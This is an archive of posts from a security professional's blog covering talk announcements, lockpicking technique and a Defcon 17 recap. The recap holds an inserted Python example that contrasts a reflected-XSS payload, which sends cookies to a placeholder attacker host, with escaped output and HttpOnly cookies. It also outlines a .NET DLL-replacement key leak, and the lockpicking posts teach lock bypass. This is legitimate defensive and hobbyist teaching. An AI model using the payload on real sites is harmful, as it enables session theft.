A week of neat security stuff

by Bill Sempf 13. February 2011 17:30


This week, I’ll be doing three neat security events, and you are invited!

Wednesday morning, I’ll be speaking at the Central Ohio ISSA about Windows Identity Foundation, OpenID and Claims Based Authentication. Details are here. This is the topic description:

“Escalation of privilege is based on a model of security that is driven by roles and groups for a given application. I am in the Administrator role, the Accounting group contains your username. What if instead you carried a token with a verifiable set of claims about your identity? One that is encrypted, requires no round trip to an authorization server, and can be coded against in a native API? Would that bring more security to our government and medical applications? Or is it just as full of holes as everything else? Join Bill in checking out Claims Based Security via Windows Identity Foundation, and see if it fixes problems or is the problem.”

That evening (wshew!) I’ll be giving a presentation on high-security locks at the Columbus Locksport International meeting at the Columbus Idea Foundry.  You can sign up here. Please RSVP if you are coming, because we need to plan for a crowd if we have one.  I’ll be covering security pins, and the idea behind sidebar locks.

Then, Friday, I’ll be at B-Sides Cleveland giving the WIF talk again.  It’s at the House of Blues, and I’ll be talking at 10AM.  The conference is sold out, though.  Too bad - it sounds like an awesome lineup, and I am just floored to be among them. Freaking ReL1K is speaking – he built the Social Engineer’s Toolkit for crying out loud. I’m truly honored.  I am looking forward to this.

Tags:

Biz | Enterprise Architecture | Locksport | AppSec

New lockpicking book coming out by the guy who taught me

by Bill Sempf 27. May 2010 05:46

Deviant Ollam, the guy who taught me (and Gabrielle) how to pick locks at Defcon 15, has a new book out, Practical Lock Picking: A Physical Penetration Tester's Training Guide.  I recommend that everyone get a copy, without ever having seen a page of it.  Fact is, Deviant has a passion for teaching - and not just lockpicking.  He is a wealth of information and a guru of many topics.  What's more, he is so very good at expressing them. 

Anyone who has been to Columbus L.I. meetings and seen me do an intro presentation knows that I use DO's Intro to Lockpicking deck that he gives at Defcon.  His site, www.deviating.net/lockpicking, is a wealth of information.  His presence at the various hacker cons has done more to spread locksport than most.

If you have an interest in physical security, I pre-recommend this book.  Too bad Syngress did it, and I wasn't allowed to write Lockpicking for Dummies.  Oh well.

Tags:

Locksport

Sempf's Laws

by BillSempf 31. January 2010 06:28

Sempf's First Law: In any system, no single effect has a single cause.
 
Sempf's Second Law: All systems can be decomposed into binary decisions.
 
Sempf's Third Law: Given the correct catalyst, all systems will accelerate descent into entropy.

Tags:

Biz | Enterprise Architecture | Locksport | Rants

Christmas came (a day) early.

by Bill Sempf 24. December 2009 10:14

Went and got the mail and I was SO VERY happy to see my new picks from LockNewbie.  I got a short hook and a Bogota to go with my long feeler, and replaced my existing short hook and half diamond in my carry set.  I am still going to keep my set of Bogotas from Rai, because how could I not??


This should about do it for me, on a day to day carry-and-practice set.  I can get into a Master 140 in about 20 seconds using the long feeler and my custom tensioner.  Rai’s Bogotas will get me into a lock with no security pins in under ten seconds usually. 

The Bogota/short hook combo seems to be a great combination for spool and mushroom pins.  They have the same feel, so I can start with the handled Bogota to get a false set, and then move to the VERY delicate short hook to pop the lock.

I got Gabrielle a Bogota and a ball feeler too – it should work well with her picking style.  And they are RED.  All in all, very happy.

Tags:

Locksport | Personal

To the spammers

by BillSempf 14. October 2009 11:24

This site is getting probably twenty spam comments a day.  I know that these are inexpensive workers that are paid by the post to get past my Captcha.  They say something unrelated and put their employer's URL in the Link field of the post to increase the link count for that URL, thus increasing the Google rank for that URL.  It is one of the ways that the fake SEO companies 'guarantee' you a top ten ranking for your URL.

I have a message for these people.

All comments on this site are approved by me.  I don't approve spam posts.  You are wasting your time, and taking money out of your OWN POCKET bothering to spam here.  Please leave me alone.

Now back to your regularly scheduled programming.

Tags:

Biz | Locksport | Rants

Listening for pin drops is a misnomer

by BillSempf 11. September 2009 05:50

When teaching beginners how to pick, I find that they quickly learn that they can hold the lock up to their ear and listen for pins dropping as they release tension on the wrench.  If you have lifted pins at all, the springs will snap them back into position with a little ‘click’.  If you know how many pins are in the lock (which you should), then you can ‘see how close you were.’

This doesn’t work.

There are two common errors in beginning lockpicking.  The first is too much tension.  This is a problem because if you rotate the cylinder within the lock too much, every pin will feel like it is binding.  You will hold every pin against the shear line no matter what, and you’ll get very poor feedback about whether you are actually lifting a pin to the shear line.

The second mistake is overlifting.  Few people know how little pressure is required to actually lift the key pin, and it is common to just ram the whole pin stack all the way to the roof without stopping at the shear line – a problem made worse by applying too much tension.

Overlifted Pin

Those two problems combine for a false sense of what is happening inside the lock.  If you lift all of the key pins up past the shear line – very easy on cheap locks – and then release tension, you’ll be able to hear all of the pins drop.  This causes the ‘oh, but I had it, ‘cause I could hear them drop’ problem.  The problem is that you didn’t have it, and there is nothing wrong with the lock; you just overlifted.  It’s a common problem.

The best thing you can do is not listen at all, in my opinion.  It’s like sniffing the cork when tasting wine – it’s not going to tell you anything.  The sommelier offers you the cork so you can make sure it isn’t dry or crumbling, NOT so you can sniff it.  Experienced pickers listen at a lock to check for something in particular, not just to see if they have any pins lifted.  I sometimes listen early on, to see if my feedback is lying to me.  I try to set one pin, and then see if it snaps back.  I don’t know if it is overlifted, or just jammed into position with too much tension.  But I do know if I made one pin stick.

So, don’t listen at the lock, at least when starting out.  Trust your fingers, and start with easy locks.

Tags:

Personal | Locksport

Defcon Recap

by BillSempf 8. August 2009 18:16

Defcon 17 is in the books, and Gabrielle and I had another fantastic time.  Props go out to all of the Defcon staff.  The Locksport International team and TOOOL put another fantastic lockpicking village together.  Coffee Wars pulled a record turnout of thirty-six brews, and we met some great people there.  (We lost badly.) And thanks to the hard working goons we met.

We arrived on Thursday, but with the new Defcon 101 tracks, we were practically late.  The lines weren’t much worse than usual but there was a badge shortage right away thanks to the fine people at Chinese Customs.  Gabrielle and I ended up with paper badges at first, but Gabrielle social engineered us into two actual badges soon thereafter.

The badge, as usual, is fantastic.  Kingpin did an over-the-top job of building a sleek, simple badge that still has lots of hacking potential and out-of-the-box functionality.  It uses the 32 pin MC56F8002 processor, with a microphone and an RGB LED to produce visual effects from aural input.  Wired Magazine actually published the open source firmware.  I am not a hardware hacker, but I have been working on getting it to produce different visual output based on pitch rather than volume.

I didn’t get his name, but one of the engineering team from Freescale (the company that made the microprocessor on the badge) came to the con.  He just set up shop in the Hardware Hacking Village and helped people program the board.  It was one of the coolest things I have seen at any con.  As some of you probably know, my hardware experience is circa 1979.  He effortlessly moved between helping me with the most basic soldering questions and the most advanced programming questions.  I was blown away.  Get me his address, someone.  I want to send him a bottle of Scotch.

It seemed like the traffic flow was worse at first compared to Defcon 15, but it soon leveled out.  Part of the problem was the need to clean out the rooms fully and then count them coming back in due to the fire code.  The marshals were around, and very visible, throughout the con.

There is a lot of talk about the Riv being too small.  I happen to disagree – I think that DT just needs to find a logistics volunteer that will orchestrate the talks in such a way to control the crowds.  I have seen Gabrielle do it.  It is possible.  (You hear that Jeff?  She will work for Absolut.)  The people at the Riv work their collective asses off to make it a good con and you just can’t replace that.  Let’s change the logistics instead.

Oh wait, there was technical content too!  Who knew?

The most significant thing I learned is that for all of the protections Code Access Security (CAS) provides in the .NET Framework, there is a mind blowing flaw.  The framework assemblies are simply resolved by name.  If you replace one of them on a machine, EVERY .NET program on that machine runs with the altered DLL.  Does that mean if you replace the encryption code to email the keys to China, that all programs will send that key to China?

Yes.

Discuss.

Props to Erez Metula.

There was a great talk on using iMacro to do screen scraping for AJAX sites, and I plan on getting some new PoCs for that up in the future.  It wasn’t rocket science, but it was a really good implementation of a simple idea that I sure as hell didn’t come up with.  I mean, if it was easy, everyone would be doing it, right?  Screen scraping is a massively underused art.  There is a LOT of information out there and the web browser just sucks for really making use of it.

So much new development was done on Metasploit in the last 12 months that they got an entire track dedicated to it.  The biggest piece is undoubtedly the Oracle module, which really puts all of the disparate Oracle attacks into one place for ease in testing.  I can’t recommend its use enough if you are a pen tester or in charge of db security.

The civil liberties content was significant compared to 15.  Nearly one whole track for three days was filled with lawyers telling us how not to go to jail when we fly to Italy on vacation with some music of questionable origin on our laptop.  I just popped in and out of these, but every time I did I learned something.

 Did you know that if you are asked to give up your password in the states you can say “come back with a warrant” but if you are flying overseas, they can just take the machine without your permission, copy the whole hard drive, and say “Thanks for the warez, d00d.”  Lesson learned?  Carry an empty laptop overseas and download your data set from a secure channel once you get there.   When done, upload results and clear the machine again.  Microsoft doesn’t even LET you carry a machine overseas.

Speaking of privacy (weren’t we, really?) social networking was a huge topic this year.  Tom Eston and Kevin Johnson gave a great talk on some proof of concept work they did on social networks and trust.  For instance, set up a parody account of a ‘B’ celebrity, and gain trust of followers.  Then send out a link for a fun quiz with an XSS attack.  Gain twitter cookie, get password, rinse and repeat.  Social Butterfly is another of their tools, which manages the creation of apps in social networking sites like Facebook.  It collects user accounts to be used for research purposes.  Check it out.  It’s not just that picture of the Christmas party last year that will get you in trouble on Facebook.
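As an added example (not Tom and Kevin's proof of concept, and not code from this post), here is the shape of the "fun quiz" attack and the two fixes that stop it. The quiz page, the `name` parameter, the cookie name and the `evil.example` host are all made up for illustration. The vulnerable renderer echoes the query parameter straight into the page; the hardened one HTML-escapes it, and the session cookie is set with HttpOnly so an injected script cannot read `document.cookie` even where an escape is missed.

```python
"""Reflected XSS in a quiz page, beside its hardened form (added example)."""
import html
from urllib.parse import parse_qs

# Constructed payload of the kind the talk described: a script that ships
# the victim's cookie to an attacker host. %2B decodes to '+'.
PAYLOAD = ("name=<script>new Image().src='http://evil.example/?c='"
           "%2Bdocument.cookie</script>")


def _name_param(query_string):
    """Pull the 'name' parameter out of a query string (empty if absent)."""
    return parse_qs(query_string).get("name", [""])[0]


def render_quiz_vulnerable(query_string):
    """Echoes untrusted input straight into HTML: reflected XSS."""
    return f"<h1>Hi {_name_param(query_string)}, which celebrity are you?</h1>"


def render_quiz_hardened(query_string):
    """Same page, but the input is escaped for an HTML text context."""
    safe = html.escape(_name_param(query_string), quote=True)
    return f"<h1>Hi {safe}, which celebrity are you?</h1>"


def session_cookie_header(session_id, secure=True):
    """Value for a Set-Cookie header.

    HttpOnly keeps script from reading the cookie, SameSite=Lax limits
    cross-site sends, Secure keeps it off plain HTTP. The cookie name
    'session' is a constructed example.
    """
    attrs = ["session=" + session_id, "HttpOnly", "SameSite=Lax", "Path=/"]
    if secure:
        attrs.append("Secure")
    return "; ".join(attrs)


def demo():
    """Run the constructed payload through both renderers."""
    return {
        "vulnerable_has_script": "<script>" in render_quiz_vulnerable(PAYLOAD),
        "hardened_has_script": "<script>" in render_quiz_hardened(PAYLOAD),
        "cookie": session_cookie_header("abc123"),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

`html.escape` is right for text between tags; input landing in an attribute, a URL, or a script block needs the escaping for that context instead, which is why the HttpOnly cookie is worth having regardless of how careful the templates are.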

Locksport village was very informative, very well attended, and very well stocked.  I picked up some new equipment and finally met both Schuyler Towne and Doug Farre in the flesh.  Doug and I are going to make some moves toward getting the Locksport International organization a little more, well, organized, and get things up and running there. 

Gringo Warrior was a hoot.  I supplied the live guard with a cigar (which he really needed!) and watched.  Deviant had a whole boatload of people, and I hadn’t practiced enough, so I didn’t do it this year.  Maybe next year.  The ah-ha moment for that was watching a very accomplished picker run the whole gamut in three minutes, and then spend ANOTHER three minutes trying to open the car door.  After that, Deviant stood by the auto locks and yelled “Everyone look!!”  Took out his auto jigglers.  “Easy lock,” pop.  “Medium lock,” pop.  “Hard lock,” pop.  “GET some jigglers people!  They aren’t that expensive!”  I got some jigglers.

My Defcon moment had to be standing in the elevator lobby waiting for a ride down from my floor, when thumping bass – LOUD thumping bass – became clearly audible.  I thought “that’s one hell of a boom box.”  Wait.  Aren’t those lights?

The door opens, and there is a full mobile DJ station in the elevator.  I kid you not.  There was a mini-rave going on right there in the elevator with a DJ and dancing babes and the obligatory big white guy who can’t dance just bobbing his head and looking cool.  It had to have been the coolest thing I have ever seen in an elevator, bar none.

Can’t wait for next year, folks.  This one was fantastic.  Till then, see you at PhreakNIC!

Tags:

Biz | C# | Cloud | Enterprise Architecture | VB | Personal | Locksport | Ninjutsu

Husband. Father. Pentester. Secure software composer. Brewer. Lockpicker. Ninja. Insurrectionist. Lumberjack. All words that have been used to describe me recently. I help people write more secure software.
